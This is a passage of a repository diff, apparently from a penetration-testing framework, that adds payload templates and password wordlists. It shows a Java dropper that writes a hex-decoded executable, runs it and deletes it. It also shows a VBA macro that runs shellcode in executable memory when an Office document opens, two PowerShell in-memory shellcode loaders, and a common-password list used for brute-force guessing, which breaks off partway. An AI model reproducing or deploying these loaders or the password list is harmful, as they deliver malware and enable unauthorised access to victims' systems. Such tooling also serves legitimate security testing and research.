+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
14
+
15
+	int %{var_numbytes} = %{var_inputstream}.available();
16
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
17
+	%{var_inputstream}.read(%{var_bytearray});
18
+	%{var_inputstream}.close();
19
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
20
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
21
+	{
22
+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
23
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
24
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
25
+		%{var_comb} <<= 4;
26
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
27
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
28
+	}
29
+
30
+	%{var_outputstream}.write(%{var_bytes});
31
+	%{var_outputstream}.close();
32
+
33
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
34
+		String[] %{var_fperm} = new String[3];
35
+		%{var_fperm}[0] = "chmod";
36
+		%{var_fperm}[1] = "+x";
37
+		%{var_fperm}[2] = %{var_exepath};
38
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
39
+		if (%{var_proc}.waitFor() == 0) {
40
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
41
+		}
42
+		
43
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
44
+	} 
45
+	else 
46
+	{
47
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
48
+	}
49
+%%>

+ 32
- 0
data/templates/scripts/to_mem.vba.template View File

@@ -0,0 +1,32 @@
1
+#If Vba7 Then
2
+	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
3
+	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
4
+	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
5
+#Else
6
+	Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
7
+	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
8
+	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
9
+#EndIf
10
+
11
+Sub Auto_Open()
12
+	Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
13
+#If Vba7 Then
14
+	Dim  %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
15
+#Else
16
+	Dim  %{var_rwxpage} As Long, %{var_res} As Long
17
+#EndIf
18
+	%{bytes}
19
+	%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
20
+	For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
21
+		%{var_myByte} = %{var_myArray}(%{var_offset})
22
+		%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
23
+	Next %{var_offset}
24
+	%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
25
+End Sub
26
+Sub AutoOpen()
27
+	Auto_Open
28
+End Sub
29
+Sub Workbook_Open()
30
+	Auto_Open
31
+End Sub
32
+

+ 30
- 0
data/templates/scripts/to_mem_dotnet.ps1.template View File

@@ -0,0 +1,30 @@
1
+Set-StrictMode -Version 2
2
+$%{var_syscode} = @"
3
+	using System;
4
+	using System.Runtime.InteropServices;
5
+	namespace %{var_kernel32} {
6
+		public class func {
7
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
8
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
9
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
10
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
11
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
12
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
13
+		}
14
+	}
15
+"@
16
+
17
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
18
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
19
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
20
+$%{var_compileParams}.GenerateInMemory = $True
21
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
22
+
23
+%{shellcode}
24
+
25
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
26
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
27
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
28
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
29
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
30
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)

+ 20
- 0
data/templates/scripts/to_mem_old.ps1.template View File

@@ -0,0 +1,20 @@
1
+$%{var_syscode} = @"
2
+[DllImport("kernel32.dll")]
3
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
4
+[DllImport("kernel32.dll")]
5
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
6
+[DllImport("msvcrt.dll")]
7
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
8
+"@
9
+
10
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
11
+
12
+%{shellcode}
13
+
14
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
15
+
16
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
17
+	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
18
+}
19
+
20
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

+ 1024
- 0
data/wordlists/burnett_top_1024.txt
File diff suppressed because it is too large
View File


+ 500
- 0
data/wordlists/burnett_top_500.txt View File

@@ -0,0 +1,500 @@
1
+password
2
+123456
3
+12345678
4
+1234
5
+qwerty
6
+12345
7
+dragon
8
+pussy
9
+baseball
10
+football
11
+letmein
12
+monkey
13
+696969
14
+abc123
15
+mustang
16
+michael
17
+shadow
18
+master
19
+jennifer
20
+111111
21
+2000
22
+jordan
23
+superman
24
+harley
25
+1234567
26
+fuckme
27
+hunter
28
+fuckyou
29
+trustno1
30
+ranger
31
+buster
32
+thomas
33
+tigger
34
+robert
35
+soccer
36
+fuck
37
+batman
38
+test
39
+pass
40
+killer
41
+hockey
42
+george
43
+charlie
44
+andrew
45
+michelle
46
+love
47
+sunshine
48
+jessica
49
+asshole
50
+6969
51
+pepper
52
+daniel
53
+access
54
+123456789
55
+654321
56
+joshua
57
+maggie
58
+starwars
59
+silver
60
+william
61
+dallas
62
+yankees
63
+123123
64
+ashley
65
+666666
66
+hello
67
+amanda
68
+orange
69
+biteme
70
+freedom
71
+computer
72
+sexy
73
+thunder
74
+nicole
75
+ginger
76
+heather
77
+hammer
78
+summer
79
+corvette
80
+taylor
81
+fucker
82
+austin
83
+1111
84
+merlin
85
+matthew
86
+121212
87
+golfer
88
+cheese
89
+princess
90
+martin
91
+chelsea
92
+patrick
93
+richard
94
+diamond
95
+yellow
96
+bigdog
97
+secret
98
+asdfgh
99
+sparky
100
+cowboy
101
+camaro
102
+anthony
103
+matrix
104
+falcon
105
+iloveyou
106
+bailey
107
+guitar
108
+jackson
109
+purple
110
+scooter
111
+phoenix
112
+aaaaaa
113
+morgan
114
+tigers
115
+porsche
116
+mickey
117
+maverick
118
+cookie
119
+nascar
120
+peanut
121
+justin
122
+131313
123
+money
124
+horny
125
+samantha
126
+panties
127
+steelers
128
+joseph
129
+snoopy
130
+boomer
131
+whatever
132
+iceman
133
+smokey
134
+gateway
135
+dakota
136
+cowboys
137
+eagles
138
+chicken
139
+dick
140
+black
141
+zxcvbn
142
+please
143
+andrea
144
+ferrari
145
+knight
146
+hardcore
147
+melissa
148
+compaq
149
+coffee
150
+booboo
151
+bitch
152
+johnny
153
+bulldog
154
+xxxxxx
155
+welcome
156
+james
157
+player
158
+ncc1701
159
+wizard
160
+scooby
161
+charles
162
+junior
163
+internet
164
+bigdick
165
+mike
166
+brandy
167
+tennis
168
+blowjob
169
+banana
170
+monster
171
+spider
172
+lakers
173
+miller
174
+rabbit
175
+enter
176
+mercedes
177
+brandon
178
+steven
179
+fender
180
+john
181
+yamaha
182
+diablo
183
+chris
184
+boston
185
+tiger
186
+marine
187
+chicago
188
+rangers
189
+gandalf
190
+winter
191
+bigtits
192
+barney
193
+edward
194
+raiders
195
+porn
196
+badboy
197
+blowme
198
+spanky
199
+bigdaddy
200
+johnson
201
+chester
202
+london
203
+midnight
204
+blue
205
+fishing
206
+000000
207
+hannah
208
+slayer
209
+11111111
210
+rachel
211
+sexsex
212
+redsox
213
+thx1138
214
+asdf
215
+marlboro
216
+panther
217
+zxcvbnm
218
+arsenal
219
+oliver
220
+qazwsx
221
+mother
222
+victoria
223
+7777777
224
+jasper
225
+angel
226
+david
227
+winner
228
+crystal
229
+golden
230
+butthead
231
+viking
232
+jack
233
+iwantu
234
+shannon
235
+murphy
236
+angels
237
+prince
238
+cameron
239
+girls
240
+madison
241
+wilson
242
+carlos
243
+hooters
244
+willie
245
+startrek
246
+captain
247
+maddog
248
+jasmine
249
+butter
250
+booger
251
+angela
252
+golf
253
+lauren
254
+rocket
255
+tiffany
256
+theman
257
+dennis
258
+liverpoo
259
+flower
260
+forever
261
+green
262
+jackie
263
+muffin
264
+turtle
265
+sophie
266
+danielle
267
+redskins
268
+toyota
269
+jason
270
+sierra
271
+winston
272
+debbie
273
+giants
274
+packers
275
+newyork
276
+jeremy
277
+casper
278
+bubba
279
+112233
280
+sandra
281
+lovers
282
+mountain
283
+united
284
+cooper
285
+driver
286
+tucker
287
+helpme
288
+fucking
289
+pookie
290
+lucky
291
+maxwell
292
+8675309
293
+bear
294
+suckit
295
+gators
296
+5150
297
+222222
298
+shithead
299
+fuckoff
300
+jaguar
301
+monica
302
+fred
303
+happy
304
+hotdog
305
+tits
306
+gemini
307
+lover
308
+xxxxxxxx
309
+777777
310
+canada
311
+nathan
312
+victor
313
+florida
314
+88888888
315
+nicholas
316
+rosebud
317
+metallic
318
+doctor
319
+trouble
320
+success
321
+stupid
322
+tomcat
323
+warrior
324
+peaches
325
+apples
326
+fish
327
+qwertyui
328
+magic
329
+buddy
330
+dolphins
331
+rainbow
332
+gunner
333
+987654
334
+freddy
335
+alexis
336
+braves
337
+cock
338
+2112
339
+1212
340
+cocacola
341
+xavier
342
+dolphin
343
+testing
344
+bond007
345
+member
346
+calvin
347
+voodoo
348
+7777
349
+samson
350
+alex
351
+apollo
352
+fire
353
+tester
354
+walter
355
+beavis
356
+voyager
357
+peter
358
+porno
359
+bonnie
360
+rush2112
361
+beer
362
+apple
363
+scorpio
364
+jonathan
365
+skippy
366
+sydney
367
+scott
368
+red123
369
+power
370
+gordon
371
+travis
372
+beaver
373
+star
374
+jackass
375
+flyers
376
+boobs
377
+232323
378
+zzzzzz
379
+steve
380
+rebecca
381
+scorpion
382
+doggie
383
+legend
384
+ou812
385
+yankee
386
+blazer
387
+bill
388
+runner
389
+birdie
390
+bitches
391
+555555
392
+parker
393
+topgun
394
+asdfasdf
395
+heaven
396
+viper
397
+animal
398
+2222
399
+bigboy
400
+4444
401
+arthur
402
+baby
403
+private
404
+godzilla
405
+donald
406
+williams
407
+lifehack
408
+phantom
409
+dave
410
+rock
411
+august
412
+sammy
413
+cool
414
+brian
415
+platinum
416
+jake
417
+bronco
418
+paul
419
+mark
420
+frank
421
+heka6w2
422
+copper
423
+billy
424
+cumshot
425
+garfield
426
+willow
427
+cunt
428
+little
429
+carter
430
+slut
431
+albert
432
+69696969
433
+kitten
434
+super
435
+jordan23
436
+eagle1
437
+shelby
438
+america
439
+11111
440
+jessie
441
+house
442
+free
443
+123321
444
+chevy
445
+bullshit
446
+white
447
+broncos
448
+horney
449
+surfer
450
+nissan
451
+999999
452
+saturn
453
+airborne
454
+elephant
455
+marvin
456
+shit
457
+action
458
+adidas
459
+qwert
460
+kevin
461
+1313
462
+explorer
463
+walker
464
+police
465
+christin
466
+december
467
+benjamin
468
+wolf
469
+sweet
470
+therock
471
+king
472
+online
473
+dickhead
474
+brooklyn
475
+teresa
476
+cricket
477
+sharon
478
+dexter
479
+racing
480
+penis
481
+gregory
482
+0000
483
+teens
484
+redwings
485
+dreams
486
+michigan
487
+hentai
488
+magnum
489
+87654321
490
+nothing
491
+donkey
492
+trinity
493
+digital
494
+3